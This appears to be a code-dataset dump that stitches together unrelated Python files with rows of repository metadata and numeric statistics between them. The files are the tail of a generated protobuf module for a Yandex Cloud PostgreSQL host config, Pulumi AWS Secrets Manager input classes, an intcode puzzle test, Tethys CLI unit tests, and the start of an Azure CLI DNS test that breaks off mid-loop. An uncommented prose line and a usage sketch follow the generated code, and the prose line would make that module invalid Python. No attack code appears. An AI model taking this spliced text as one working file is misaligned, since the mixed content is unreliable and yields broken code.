serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_seqscan', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.enable_seqscan', index=59,
number=62, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_sort', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.enable_sort', index=60,
number=63, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_tidscan', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.enable_tidscan', index=61,
number=64, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='max_parallel_workers', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.max_parallel_workers', index=62,
number=65, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0060-1024', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='max_parallel_workers_per_gather', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.max_parallel_workers_per_gather', index=63,
number=66, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0060-1024', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='timezone', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.timezone', index=64,
number=67, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='effective_io_concurrency', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.effective_io_concurrency', index=65,
number=68, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0060-1000', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='effective_cache_size', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.effective_cache_size', index=66,
number=69, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0160-549755813888', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
_POSTGRESQLHOSTCONFIG13_CONSTRAINTEXCLUSION,
_POSTGRESQLHOSTCONFIG13_FORCEPARALLELMODE,
_POSTGRESQLHOSTCONFIG13_LOGLEVEL,
_POSTGRESQLHOSTCONFIG13_LOGERRORVERBOSITY,
_POSTGRESQLHOSTCONFIG13_LOGSTATEMENT,
_POSTGRESQLHOSTCONFIG13_TRANSACTIONISOLATION,
_POSTGRESQLHOSTCONFIG13_BYTEAOUTPUT,
_POSTGRESQLHOSTCONFIG13_XMLBINARY,
_POSTGRESQLHOSTCONFIG13_XMLOPTION,
_POSTGRESQLHOSTCONFIG13_BACKSLASHQUOTE,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=157,
serialized_end=6133,
)
_POSTGRESQLHOSTCONFIG13.fields_by_name['recovery_min_apply_delay'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['shared_buffers'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['temp_buffers'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['work_mem'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['temp_file_limit'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['backend_flush_after'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['old_snapshot_threshold'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['max_standby_streaming_delay'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['constraint_exclusion'].enum_type = _POSTGRESQLHOSTCONFIG13_CONSTRAINTEXCLUSION
_POSTGRESQLHOSTCONFIG13.fields_by_name['cursor_tuple_fraction'].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['from_collapse_limit'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['join_collapse_limit'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['force_parallel_mode'].enum_type = _POSTGRESQLHOSTCONFIG13_FORCEPARALLELMODE
_POSTGRESQLHOSTCONFIG13.fields_by_name['client_min_messages'].enum_type = _POSTGRESQLHOSTCONFIG13_LOGLEVEL
_POSTGRESQLHOSTCONFIG13.fields_by_name['log_min_messages'].enum_type = _POSTGRESQLHOSTCONFIG13_LOGLEVEL
_POSTGRESQLHOSTCONFIG13.fields_by_name['log_min_error_statement'].enum_type = _POSTGRESQLHOSTCONFIG13_LOGLEVEL
_POSTGRESQLHOSTCONFIG13.fields_by_name['log_min_duration_statement'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['log_checkpoints'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['log_connections'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['log_disconnections'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['log_duration'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['log_error_verbosity'].enum_type = _POSTGRESQLHOSTCONFIG13_LOGERRORVERBOSITY
_POSTGRESQLHOSTCONFIG13.fields_by_name['log_lock_waits'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['log_statement'].enum_type = _POSTGRESQLHOSTCONFIG13_LOGSTATEMENT
_POSTGRESQLHOSTCONFIG13.fields_by_name['log_temp_files'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['row_security'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['default_transaction_isolation'].enum_type = _POSTGRESQLHOSTCONFIG13_TRANSACTIONISOLATION
_POSTGRESQLHOSTCONFIG13.fields_by_name['statement_timeout'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['lock_timeout'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['idle_in_transaction_session_timeout'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['bytea_output'].enum_type = _POSTGRESQLHOSTCONFIG13_BYTEAOUTPUT
_POSTGRESQLHOSTCONFIG13.fields_by_name['xmlbinary'].enum_type = _POSTGRESQLHOSTCONFIG13_XMLBINARY
_POSTGRESQLHOSTCONFIG13.fields_by_name['xmloption'].enum_type = _POSTGRESQLHOSTCONFIG13_XMLOPTION
_POSTGRESQLHOSTCONFIG13.fields_by_name['gin_pending_list_limit'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['deadlock_timeout'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['max_locks_per_transaction'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['max_pred_locks_per_transaction'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['array_nulls'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['backslash_quote'].enum_type = _POSTGRESQLHOSTCONFIG13_BACKSLASHQUOTE
_POSTGRESQLHOSTCONFIG13.fields_by_name['default_with_oids'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['escape_string_warning'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['lo_compat_privileges'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['operator_precedence_warning'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['quote_all_identifiers'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['standard_conforming_strings'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['synchronize_seqscans'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['transform_null_equals'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['exit_on_error'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['seq_page_cost'].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['random_page_cost'].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['enable_bitmapscan'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['enable_hashagg'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['enable_hashjoin'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['enable_indexscan'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['enable_indexonlyscan'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['enable_material'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['enable_mergejoin'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['enable_nestloop'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['enable_seqscan'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['enable_sort'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['enable_tidscan'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['max_parallel_workers'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['max_parallel_workers_per_gather'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['effective_io_concurrency'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['effective_cache_size'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13_CONSTRAINTEXCLUSION.containing_type = _POSTGRESQLHOSTCONFIG13
_POSTGRESQLHOSTCONFIG13_FORCEPARALLELMODE.containing_type = _POSTGRESQLHOSTCONFIG13
_POSTGRESQLHOSTCONFIG13_LOGLEVEL.containing_type = _POSTGRESQLHOSTCONFIG13
_POSTGRESQLHOSTCONFIG13_LOGERRORVERBOSITY.containing_type = _POSTGRESQLHOSTCONFIG13
_POSTGRESQLHOSTCONFIG13_LOGSTATEMENT.containing_type = _POSTGRESQLHOSTCONFIG13
_POSTGRESQLHOSTCONFIG13_TRANSACTIONISOLATION.containing_type = _POSTGRESQLHOSTCONFIG13
_POSTGRESQLHOSTCONFIG13_BYTEAOUTPUT.containing_type = _POSTGRESQLHOSTCONFIG13
_POSTGRESQLHOSTCONFIG13_XMLBINARY.containing_type = _POSTGRESQLHOSTCONFIG13
_POSTGRESQLHOSTCONFIG13_XMLOPTION.containing_type = _POSTGRESQLHOSTCONFIG13
_POSTGRESQLHOSTCONFIG13_BACKSLASHQUOTE.containing_type = _POSTGRESQLHOSTCONFIG13
DESCRIPTOR.message_types_by_name['PostgresqlHostConfig13'] = _POSTGRESQLHOSTCONFIG13
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
PostgresqlHostConfig13 = _reflection.GeneratedProtocolMessageType('PostgresqlHostConfig13', (_message.Message,), {
'DESCRIPTOR' : _POSTGRESQLHOSTCONFIG13,
'__module__' : 'yandex.cloud.mdb.postgresql.v1.config.host13_pb2'
# @@protoc_insertion_point(class_scope:yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13)
})
_sym_db.RegisterMessage(PostgresqlHostConfig13)
DESCRIPTOR._options = None
_POSTGRESQLHOSTCONFIG13.fields_by_name['backend_flush_after']._options = None
_POSTGRESQLHOSTCONFIG13.fields_by_name['old_snapshot_threshold']._options = None
_POSTGRESQLHOSTCONFIG13.fields_by_name['from_collapse_limit']._options = None
_POSTGRESQLHOSTCONFIG13.fields_by_name['join_collapse_limit']._options = None
_POSTGRESQLHOSTCONFIG13.fields_by_name['max_parallel_workers']._options = None
_POSTGRESQLHOSTCONFIG13.fields_by_name['max_parallel_workers_per_gather']._options = None
_POSTGRESQLHOSTCONFIG13.fields_by_name['effective_io_concurrency']._options = None
_POSTGRESQLHOSTCONFIG13.fields_by_name['effective_cache_size']._options = None
# @@protoc_insertion_point(module_scope)
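For reference, a minimal usage sketch of the generated message. The import path is taken from the __module__ entry above; the concrete field values are illustrative assumptions, not defaults from the source.

# Usage sketch; wrapper types (Int64Value/BoolValue) let the API distinguish
# "field not set" from a zero/false value, which plain proto3 scalars cannot.
from google.protobuf import wrappers_pb2
from yandex.cloud.mdb.postgresql.v1.config import host13_pb2

cfg = host13_pb2.PostgresqlHostConfig13(
    shared_buffers=wrappers_pb2.Int64Value(value=134217728),  # illustrative value, in bytes
    log_checkpoints=wrappers_pb2.BoolValue(value=True),
    log_statement=host13_pb2.PostgresqlHostConfig13.LOG_STATEMENT_DDL,
)
print(cfg.HasField('shared_buffers'))  # True: wrapped fields support presence checks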
| 65.640196
| 9,166
| 0.797769
| 8,550
| 66,953
| 5.878363
| 0.060702
| 0.041385
| 0.087326
| 0.068225
| 0.780919
| 0.764544
| 0.756725
| 0.740251
| 0.718046
| 0.677457
| 0
| 0.054656
| 0.098487
| 66,953
| 1,019
| 9,167
| 65.704612
| 0.778028
| 0.005108
| 0
| 0.613751
| 1
| 0.008089
| 0.233919
| 0.200225
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.006067
| 0
| 0.006067
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
db2a68efc21037b8245aec7fcd6a0709e07240e0
| 2,164
|
py
|
Python
|
sdk/python/pulumi_aws/secretsmanager/_inputs.py
|
mdop-wh/pulumi-aws
|
05bb32e9d694dde1c3b76d440fd2cd0344d23376
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/secretsmanager/_inputs.py
|
mdop-wh/pulumi-aws
|
05bb32e9d694dde1c3b76d440fd2cd0344d23376
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/secretsmanager/_inputs.py
|
mdop-wh/pulumi-aws
|
05bb32e9d694dde1c3b76d440fd2cd0344d23376
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Dict, List, Mapping, Optional, Tuple, Union
from .. import _utilities, _tables
__all__ = [
'SecretRotationRotationRulesArgs',
'SecretRotationRulesArgs',
]
@pulumi.input_type
class SecretRotationRotationRulesArgs:
def __init__(__self__, *,
automatically_after_days: pulumi.Input[float]):
"""
:param pulumi.Input[float] automatically_after_days: Specifies the number of days between automatic scheduled rotations of the secret.
"""
pulumi.set(__self__, "automatically_after_days", automatically_after_days)
@property
@pulumi.getter(name="automaticallyAfterDays")
def automatically_after_days(self) -> pulumi.Input[float]:
"""
Specifies the number of days between automatic scheduled rotations of the secret.
"""
return pulumi.get(self, "automatically_after_days")
@automatically_after_days.setter
def automatically_after_days(self, value: pulumi.Input[float]):
pulumi.set(self, "automatically_after_days", value)
@pulumi.input_type
class SecretRotationRulesArgs:
def __init__(__self__, *,
automatically_after_days: pulumi.Input[float]):
"""
:param pulumi.Input[float] automatically_after_days: Specifies the number of days between automatic scheduled rotations of the secret.
"""
pulumi.set(__self__, "automatically_after_days", automatically_after_days)
@property
@pulumi.getter(name="automaticallyAfterDays")
def automatically_after_days(self) -> pulumi.Input[float]:
"""
Specifies the number of days between automatic scheduled rotations of the secret.
"""
return pulumi.get(self, "automatically_after_days")
@automatically_after_days.setter
def automatically_after_days(self, value: pulumi.Input[float]):
pulumi.set(self, "automatically_after_days", value)
| 36.066667
| 142
| 0.712569
| 242
| 2,164
| 6.090909
| 0.297521
| 0.21981
| 0.268657
| 0.141113
| 0.72863
| 0.72863
| 0.72863
| 0.72863
| 0.72863
| 0.72863
| 0
| 0.000575
| 0.195933
| 2,164
| 59
| 143
| 36.677966
| 0.846552
| 0.28281
| 0
| 0.666667
| 1
| 0
| 0.166323
| 0.166323
| 0
| 0
| 0
| 0
| 0
| 1
| 0.181818
| false
| 0
| 0.151515
| 0
| 0.454545
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e1d87411fb96da065e806ccc7f4e72aedfc9905b
| 446
|
py
|
Python
|
day2/test_day2.py
|
Sundin/advent-of-code-2019
|
7ba5971ab5deeec61c60e6acbe1ac223876e77fe
|
[
"MIT"
] | null | null | null |
day2/test_day2.py
|
Sundin/advent-of-code-2019
|
7ba5971ab5deeec61c60e6acbe1ac223876e77fe
|
[
"MIT"
] | null | null | null |
day2/test_day2.py
|
Sundin/advent-of-code-2019
|
7ba5971ab5deeec61c60e6acbe1ac223876e77fe
|
[
"MIT"
] | null | null | null |
from day2 import *
import unittest
def test_run_intcode_computer():
assert run_intcode_computer([1,0,0,0,99]) == [2,0,0,0,99]
assert run_intcode_computer([2,3,0,3,99]) == [2,3,0,6,99]
assert run_intcode_computer([2,4,4,5,99,0]) == [2,4,4,5,99,9801]
assert run_intcode_computer([1,1,1,4,99,5,6,0,99]) == [30,1,1,4,2,5,6,0,99]
assert run_intcode_computer([1,9,10,3,2,3,11,0,99,30,40,50]) == [3500,9,10,70,2,3,11,0,99,30,40,50]
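The day2 module under test is not included in this row. A minimal interpreter consistent with the assertions above would look like the following sketch; it is an inference from the test cases (opcode 1 adds, opcode 2 multiplies, 99 halts, all parameters positional), not the actual day2 implementation.

def run_intcode_computer(program):
    # Sketch inferred from the asserts above; not the real day2 module.
    memory = list(program)  # work on a copy so the input list is untouched
    ip = 0
    while memory[ip] != 99:  # opcode 99 halts the machine
        op, a, b, dst = memory[ip:ip + 4]
        if op == 1:
            memory[dst] = memory[a] + memory[b]
        elif op == 2:
            memory[dst] = memory[a] * memory[b]
        else:
            raise ValueError("unknown opcode {} at position {}".format(op, ip))
        ip += 4  # every instruction here is four cells wide
    return memory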
| 44.6
| 103
| 0.647982
| 104
| 446
| 2.653846
| 0.259615
| 0.217391
| 0.391304
| 0.434783
| 0.615942
| 0.391304
| 0.094203
| 0.094203
| 0
| 0
| 0
| 0.261965
| 0.109865
| 446
| 9
| 104
| 49.555556
| 0.433249
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.625
| 1
| 0.125
| true
| 0
| 0.25
| 0
| 0.375
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2252a2644c4f46ed139989cc4c39c1696d549f4a
| 2,996
|
py
|
Python
|
tests/unit_tests/test_tethys_apps/test_cli/test_list_commands.py
|
quyendong/tethys
|
99bcb524d5b2021b88d5fa15b7ed6b8acb460997
|
[
"BSD-2-Clause"
] | 1
|
2020-10-08T20:38:33.000Z
|
2020-10-08T20:38:33.000Z
|
tests/unit_tests/test_tethys_apps/test_cli/test_list_commands.py
|
quyendong/tethys
|
99bcb524d5b2021b88d5fa15b7ed6b8acb460997
|
[
"BSD-2-Clause"
] | 1
|
2018-04-14T19:40:54.000Z
|
2018-04-14T19:40:54.000Z
|
tests/unit_tests/test_tethys_apps/test_cli/test_list_commands.py
|
quyendong/tethys
|
99bcb524d5b2021b88d5fa15b7ed6b8acb460997
|
[
"BSD-2-Clause"
] | 1
|
2021-09-07T14:47:11.000Z
|
2021-09-07T14:47:11.000Z
|
import unittest
import mock
from tethys_apps.cli.list_command import list_command
try:
from StringIO import StringIO
except ImportError:
from io import StringIO # noqa: F401
class ListCommandTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
@mock.patch('tethys_apps.cli.list_command.print')
@mock.patch('tethys_apps.cli.list_command.get_installed_tethys_extensions')
@mock.patch('tethys_apps.cli.list_command.get_installed_tethys_apps')
def test_list_command_installed_apps(self, mock_installed_apps, mock_installed_extensions, mock_print):
mock_args = mock.MagicMock()
mock_installed_apps.return_value = {'foo': '/foo', 'bar': "/bar"}
mock_installed_extensions.return_value = {}
list_command(mock_args)
mock_installed_apps.assert_called_once()
# Check if print is called correctly
rts_call_args = mock_print.call_args_list
check_list = []
for i in range(len(rts_call_args)):
check_list.append(rts_call_args[i][0][0])
self.assertIn('Apps:', check_list)
self.assertIn(' foo', check_list)
self.assertIn(' bar', check_list)
@mock.patch('tethys_apps.cli.list_command.print')
@mock.patch('tethys_apps.cli.list_command.get_installed_tethys_extensions')
@mock.patch('tethys_apps.cli.list_command.get_installed_tethys_apps')
def test_list_command_installed_extensions(self, mock_installed_apps, mock_installed_extensions, mock_print):
mock_args = mock.MagicMock()
mock_installed_apps.return_value = {}
mock_installed_extensions.return_value = {'baz': '/baz'}
list_command(mock_args)
# Check if print is called correctly
rts_call_args = mock_print.call_args_list
check_list = []
for i in range(len(rts_call_args)):
check_list.append(rts_call_args[i][0][0])
self.assertIn('Extensions:', check_list)
self.assertIn(' baz', check_list)
@mock.patch('tethys_apps.cli.list_command.print')
@mock.patch('tethys_apps.cli.list_command.get_installed_tethys_extensions')
@mock.patch('tethys_apps.cli.list_command.get_installed_tethys_apps')
def test_list_command_installed_both(self, mock_installed_apps, mock_installed_extensions, mock_print):
mock_args = mock.MagicMock()
mock_installed_apps.return_value = {'foo': '/foo', 'bar': "/bar"}
mock_installed_extensions.return_value = {'baz': '/baz'}
list_command(mock_args)
# Check if print is called correctly
rts_call_args = mock_print.call_args_list
check_list = []
for i in range(len(rts_call_args)):
check_list.append(rts_call_args[i][0][0])
self.assertIn('Apps:', check_list)
self.assertIn(' foo', check_list)
self.assertIn(' bar', check_list)
self.assertIn('Extensions:', check_list)
self.assertIn(' baz', check_list)
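The list_command implementation itself is not part of this row. From the patched names and the printed lines asserted above, a consistent sketch would be the following; the helper import path is an assumption (the mocks only show that both getters are imported into the list_command module).

# Sketch inferred from the assertions above; not the real
# tethys_apps.cli.list_command module.
from tethys_apps.utilities import (  # assumed import path
    get_installed_tethys_apps,
    get_installed_tethys_extensions,
)

def list_command(args):
    apps = get_installed_tethys_apps()
    extensions = get_installed_tethys_extensions()
    if apps:
        print('Apps:')
        for name in apps:
            print('  {}'.format(name))  # two-space indent, as the tests expect
    if extensions:
        print('Extensions:')
        for name in extensions:
            print('  {}'.format(name))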
| 36.096386
| 113
| 0.693591
| 394
| 2,996
| 4.918782
| 0.139594
| 0.096491
| 0.067079
| 0.087719
| 0.865325
| 0.852941
| 0.852941
| 0.852941
| 0.852941
| 0.852941
| 0
| 0.00375
| 0.198932
| 2,996
| 82
| 114
| 36.536585
| 0.80375
| 0.038385
| 0
| 0.728814
| 0
| 0
| 0.190542
| 0.154381
| 0
| 0
| 0
| 0
| 0.186441
| 1
| 0.084746
| false
| 0.033898
| 0.101695
| 0
| 0.20339
| 0.152542
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
22600a57d4b310a8b8a79c1799a74fce742c848e
| 9,010
|
py
|
Python
|
src/dns/azext_dns/tests/latest/test_dns_commands.py
|
mayank88mahajan/azure-cli-extensions
|
8bd389a1877bffd14052bec5519ce75dc6fc34cf
|
[
"MIT"
] | 1
|
2019-05-10T19:58:09.000Z
|
2019-05-10T19:58:09.000Z
|
src/dns/azext_dns/tests/latest/test_dns_commands.py
|
mayank88mahajan/azure-cli-extensions
|
8bd389a1877bffd14052bec5519ce75dc6fc34cf
|
[
"MIT"
] | null | null | null |
src/dns/azext_dns/tests/latest/test_dns_commands.py
|
mayank88mahajan/azure-cli-extensions
|
8bd389a1877bffd14052bec5519ce75dc6fc34cf
|
[
"MIT"
] | 1
|
2021-07-28T14:50:54.000Z
|
2021-07-28T14:50:54.000Z
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=line-too-long
import os
import unittest
from azure.cli.testsdk import ScenarioTest, ResourceGroupPreparer
TEST_DIR = os.path.abspath(os.path.join(os.path.abspath(__file__), '..'))
class DnsScenarioTest(ScenarioTest):
@ResourceGroupPreparer(name_prefix='cli_test_dns')
def test_dns(self, resource_group): # pylint: disable=unused-argument
self.kwargs['zone'] = 'myzone.com'
self.cmd('network dns zone list')  # just verify it works (no Exception raised)
self.cmd('network dns zone create -n {zone} -g {rg}')
self.cmd('network dns zone list -g {rg}',
checks=self.check('length(@)', 1))
base_record_sets = 2
self.cmd('network dns zone show -n {zone} -g {rg}',
checks=self.check('numberOfRecordSets', base_record_sets))
args = {
'a': '--ipv4-address 10.0.0.10',
'aaaa': '--ipv6-address 2001:db8:0:1:1:1:1:1',
'caa': '--flags 0 --tag foo --value "my value"',
'cname': '--cname mycname',
'mx': '--exchange 12 --preference 13',
'ns': '--nsdname foobar.com',
'ptr': '--ptrdname foobar.com',
'soa': '--email foo.com --expire-time 30 --minimum-ttl 20 --refresh-time 60 --retry-time 90 --serial-number 123',
'srv': '--port 1234 --priority 1 --target target.com --weight 50',
'txt': '--value some_text'
}
record_types = ['a', 'aaaa', 'caa', 'cname', 'mx', 'ns', 'ptr', 'srv', 'txt']
for t in record_types:
# test creating the record set and then adding records
